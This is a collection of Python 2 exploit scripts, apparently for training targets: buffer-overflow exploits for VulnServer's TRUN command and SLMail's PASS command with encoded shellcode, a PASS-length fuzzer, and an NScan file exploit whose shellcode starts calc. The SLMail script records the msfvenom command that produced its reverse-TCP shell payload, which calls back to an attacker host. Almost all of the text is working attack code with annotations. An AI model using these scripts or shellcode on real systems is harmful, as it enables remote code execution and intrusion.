Python exploit pack
VulnServer
Code:
#!/usr/bin/python
import socket
import struct
# VulnServer "TRUN" stack overflow. The argument of the TRUN command is
# overflowed with 2006 bytes of filler; the next 4 bytes overwrite the saved
# return address with 0x625011AF (written little-endian by struct.pack), and
# are followed by a 16-byte NOP sled and the shellcode. This page does not
# say what instruction lives at 0x625011AF, nor how the shellcode below was
# generated (the SLMail script further down records both for its own case);
# the byte string is reproduced exactly as given.
shellcode = ""
shellcode += "\xb8\xc5\x97\xc9\x70\xdb\xc1\xd9\x74\x24\xf4\x5b"
shellcode += "\x2b\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\x06"
shellcode += "\x93\x2b\x85\x74\x74\x29\x66\x84\x85\x4e\xee\x61"
shellcode += "\xb4\x4e\x94\xe2\xe7\x7e\xde\xa6\x0b\xf4\xb2\x52"
shellcode += "\x9f\x78\x1b\x55\x28\x36\x7d\x58\xa9\x6b\xbd\xfb"
shellcode += "\x29\x76\x92\xdb\x10\xb9\xe7\x1a\x54\xa4\x0a\x4e"
shellcode += "\x0d\xa2\xb9\x7e\x3a\xfe\x01\xf5\x70\xee\x01\xea"
shellcode += "\xc1\x11\x23\xbd\x5a\x48\xe3\x3c\x8e\xe0\xaa\x26"
shellcode += "\xd3\xcd\x65\xdd\x27\xb9\x77\x37\x76\x42\xdb\x76"
shellcode += "\xb6\xb1\x25\xbf\x71\x2a\x50\xc9\x81\xd7\x63\x0e"
shellcode += "\xfb\x03\xe1\x94\x5b\xc7\x51\x70\x5d\x04\x07\xf3"
shellcode += "\x51\xe1\x43\x5b\x76\xf4\x80\xd0\x82\x7d\x27\x36"
shellcode += "\x03\xc5\x0c\x92\x4f\x9d\x2d\x83\x35\x70\x51\xd3"
shellcode += "\x95\x2d\xf7\x98\x38\x39\x8a\xc3\x54\x8e\xa7\xfb"
shellcode += "\xa4\x98\xb0\x88\x96\x07\x6b\x06\x9b\xc0\xb5\xd1"
shellcode += "\xdc\xfa\x02\x4d\x23\x05\x73\x44\xe0\x51\x23\xfe"
shellcode += "\xc1\xd9\xa8\xfe\xee\x0f\x7e\xae\x40\xe0\x3f\x1e"
shellcode += "\x21\x50\xa8\x74\xae\x8f\xc8\x77\x64\xb8\x63\x82"
shellcode += "\xef\x07\xdb\x8c\xe2\xef\x1e\x8c\xe3\x7f\x97\x6a"
shellcode += "\x71\x90\xfe\x25\xee\x09\x5b\xbd\x8f\xd6\x71\xb8"
shellcode += "\x90\x5d\x76\x3d\x5e\x96\xf3\x2d\x37\x56\x4e\x0f"
shellcode += "\x9e\x69\x64\x27\x7c\xfb\xe3\xb7\x0b\xe0\xbb\xe0"
shellcode += "\x5c\xd6\xb5\x64\x71\x41\x6c\x9a\x88\x17\x57\x1e"
shellcode += "\x57\xe4\x56\x9f\x1a\x50\x7d\x8f\xe2\x59\x39\xfb"
shellcode += "\xba\x0f\x97\x55\x7d\xe6\x59\x0f\xd7\x55\x30\xc7"
shellcode += "\xae\x95\x83\x91\xae\xf3\x75\x7d\x1e\xaa\xc3\x82"
shellcode += "\xaf\x3a\xc4\xfb\xcd\xda\x2b\xd6\x55\xea\x61\x7a"
shellcode += "\xff\x63\x2c\xef\xbd\xe9\xcf\xda\x82\x17\x4c\xee"
shellcode += "\x7a\xec\x4c\x9b\x7f\xa8\xca\x70\xf2\xa1\xbe\x76"
shellcode += "\xa1\xc2\xea"
# The shellcode above is 351 bytes (29 lines of 12 bytes plus 3), so the TRUN
# argument sent below is 2006 + 4 + 16 + 351 = 2377 bytes. Detection note:
# that single oversized TRUN argument is the observable on the wire; a length
# bound on the TRUN argument is a reasonable signature for this traffic.
payload = 'A' * 2006 + struct.pack("<L",0x625011AF) + '\x90' * 16 + shellcode
try:
    print "\nSending Random Bytes..."
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # connect() returns None; the assignment is never read afterwards.
    connect=s.connect(('192.168.0.24',9999))
    # Read whatever the server sends on connect before issuing the command.
    s.recv(1024)
    s.send(('TRUN .' + payload + '\r\n'))
    s.recv(1024)
    s.send('EXIT\r\n')
    s.close()
    print "\nExploit Done. Checking..."
except:
    # NOTE(review): a bare except also catches KeyboardInterrupt and any error
    # raised after connect() succeeded (recv/send/close), so the message below
    # is misleading whenever the failure is not a connection failure.
    print "Could not connect to 9999 for some reason..."
SLMail
Code:
#!/usr/bin/python
import socket
# SLMail POP3 stack overflow in the argument of the PASS command. The
# annotations below (return address, msfvenom command, payload size) were
# recorded by the author and are kept verbatim.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Address=5F4A358F Message=0x5f4a358f: '\xff\xe4' | {PAGE_READONLY} [SLMFC.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v6.00.8063.0 (C:\Windows\system32\SLMFC.DLL)
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.13 LPORT=4444 -f python -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
# Payload size: 351 bytes
shellcode = ""
shellcode += "\xd9\xc9\xb8\x2d\xa8\x1e\xe6\xd9\x74\x24\xf4\x5b"
shellcode += "\x33\xc9\xb1\x52\x31\x43\x17\x03\x43\x17\x83\xc6"
shellcode += "\x54\xfc\x13\xe4\x4d\x83\xdc\x14\x8e\xe4\x55\xf1"
shellcode += "\xbf\x24\x01\x72\xef\x94\x41\xd6\x1c\x5e\x07\xc2"
shellcode += "\x97\x12\x80\xe5\x10\x98\xf6\xc8\xa1\xb1\xcb\x4b"
shellcode += "\x22\xc8\x1f\xab\x1b\x03\x52\xaa\x5c\x7e\x9f\xfe"
shellcode += "\x35\xf4\x32\xee\x32\x40\x8f\x85\x09\x44\x97\x7a"
shellcode += "\xd9\x67\xb6\x2d\x51\x3e\x18\xcc\xb6\x4a\x11\xd6"
shellcode += "\xdb\x77\xeb\x6d\x2f\x03\xea\xa7\x61\xec\x41\x86"
shellcode += "\x4d\x1f\x9b\xcf\x6a\xc0\xee\x39\x89\x7d\xe9\xfe"
shellcode += "\xf3\x59\x7c\xe4\x54\x29\x26\xc0\x65\xfe\xb1\x83"
shellcode += "\x6a\x4b\xb5\xcb\x6e\x4a\x1a\x60\x8a\xc7\x9d\xa6"
shellcode += "\x1a\x93\xb9\x62\x46\x47\xa3\x33\x22\x26\xdc\x23"
shellcode += "\x8d\x97\x78\x28\x20\xc3\xf0\x73\x2d\x20\x39\x8b"
shellcode += "\xad\x2e\x4a\xf8\x9f\xf1\xe0\x96\x93\x7a\x2f\x61"
shellcode += "\xd3\x50\x97\xfd\x2a\x5b\xe8\xd4\xe8\x0f\xb8\x4e"
shellcode += "\xd8\x2f\x53\x8e\xe5\xe5\xf4\xde\x49\x56\xb5\x8e"
shellcode += "\x29\x06\x5d\xc4\xa5\x79\x7d\xe7\x6f\x12\x14\x12"
shellcode += "\xf8\xdd\x41\x1c\xf5\xb5\x93\x1c\x14\x1a\x1d\xfa"
shellcode += "\x7c\xb2\x4b\x55\xe9\x2b\xd6\x2d\x88\xb4\xcc\x48"
shellcode += "\x8a\x3f\xe3\xad\x45\xc8\x8e\xbd\x32\x38\xc5\x9f"
shellcode += "\x95\x47\xf3\xb7\x7a\xd5\x98\x47\xf4\xc6\x36\x10"
shellcode += "\x51\x38\x4f\xf4\x4f\x63\xf9\xea\x8d\xf5\xc2\xae"
shellcode += "\x49\xc6\xcd\x2f\x1f\x72\xea\x3f\xd9\x7b\xb6\x6b"
shellcode += "\xb5\x2d\x60\xc5\x73\x84\xc2\xbf\x2d\x7b\x8d\x57"
shellcode += "\xab\xb7\x0e\x21\xb4\x9d\xf8\xcd\x05\x48\xbd\xf2"
shellcode += "\xaa\x1c\x49\x8b\xd6\xbc\xb6\x46\x53\xcc\xfc\xca"
shellcode += "\xf2\x45\x59\x9f\x46\x08\x5a\x4a\x84\x35\xd9\x7e"
shellcode += "\x75\xc2\xc1\x0b\x70\x8e\x45\xe0\x08\x9f\x23\x06"
shellcode += "\xbe\xa0\x61"
# Layout: 2606 bytes of filler reach the saved return address, which is
# overwritten with the SLMFC.DLL address noted above written little-endian
# ("\x8f\x35\x4a\x5f" is 0x5F4A358F), then an 8-byte NOP sled and the
# 351-byte encoded payload -- 2969 bytes in the PASS argument altogether.
# The bytes excluded by the encoder (\x00\x0a\x0d) are the C string
# terminator and the CR/LF that delimit POP3 commands; this script itself
# relies on '\r\n' as the command terminator. The DLL annotation records
# "ASLR: False", which is why a fixed absolute address can be used at all;
# on a randomised module this address would not be stable.
payload = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
try:
    print "\nSending random bytes..."
    s.connect(('192.168.0.26', 110))
    # POP3 exchange: greeting, USER, then PASS carrying the oversized buffer.
    # The USER value does not need to exist; the overflow is in PASS handling.
    data = s.recv(1024)
    s.send('USER legit' + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + payload + '\r\n')
    data = s.recv(1024)
    s.close()
    print "\nExploit Done.. Checking..?"
except:
    # NOTE(review): a bare except hides the real cause -- any failure after
    # connect() (recv/send) is reported as a connection problem, and
    # KeyboardInterrupt is swallowed too.
    print "Could not connect to POP3 for some reason..."
SLMail Fuzzer
Code:
#!/usr/bin/python
import socket
# Build 31 test strings: a single "A", then 100, 300, 500, ... 5900 "A"s
# (30 appends with a step of 200). Each string is sent as the PASS argument
# in its own POP3 session.
# NOTE(review): `buffer` shadows the Python 2 builtin and `string` shadows the
# stdlib module name; harmless here, but worth renaming if this is reused.
buffer=["A"]
counter=100
while len(buffer) <= 30:
    buffer.append("A"*counter)
    counter=counter+200
for string in buffer:
    print "Fuzzing PASS with %s bytes" % len(string)
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # There is no error handling: the first connect() that fails ends the
    # script with a traceback, so the last size printed is the last one the
    # service accepted a connection for. Responses to PASS/QUIT are not read.
    connect=s.connect(('192.168.0.19',110))
    s.recv(1024)
    s.send('USER test\r\n')
    s.recv(1024)
    s.send('PASS ' + string + '\r\n')
    s.send('QUIT\r\n')
    s.close()
NScan
Code:
import struct
# NScan saved-return-pointer overwrite, delivered through a file rather than
# over the network: 997 bytes of filler, the 4-byte return address, a 10-byte
# NOP sled and a 16-byte hand-written shellcode -- 1027 bytes in total.
junk = '\x41'*997 # 997 bytes
eip = struct.pack("<L",0x7c836a78) # use little-endian to address 0x7c836a78 # call esp # kernel32.dll
nops = '\x90'*10
# The shellcode pushes a zero dword and then the dword 0x636c6163, whose
# little-endian bytes "\x63\x61\x6C\x63" spell "calc", leaving a
# NUL-terminated "calc" string on the stack; it then pushes a pointer to that
# string and calls the function at 0x77c293c7. The page does not identify that
# function. Both absolute addresses (0x7c836a78 in kernel32.dll and 0x77c293c7)
# are specific to the author's target OS/library builds and assume no ASLR;
# they are not portable.
shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x63\x61\x6C\x63" # push 0x636c6163
shellcode += "\x54" # push dword ptr esp
shellcode += "\xB8\xC7\x93\xC2\x77" # mov eax,0x77c293c7
shellcode += "\xFF\xD0" # call eax
payload = junk + eip + nops + shellcode # combine exploit with nop sled and working shellcode
try:
    # Output path is hard-coded to the author's desktop; "wb" with a Python 2
    # str writes the bytes unchanged.
    f = open("C:\\Documents and Settings\\user\\Desktop\\log\\dig\\payload.txt","wb")
    f.write(payload)
    f.close()
    print "\nNScan Saved Return Pointer Overwrite Exploit"
    print "\nExploit written successfully!"
    print "Buffer size: " + str(len(payload)) + "\n"
except Exception, e:
    # Python 2 "except X, e" syntax; in practice this catches an I/O error from
    # open()/write() (missing directory, permissions) and prints it.
    print "\nError! Exploit could not be generated, error details follow:\n"
    print str(e) + "\n"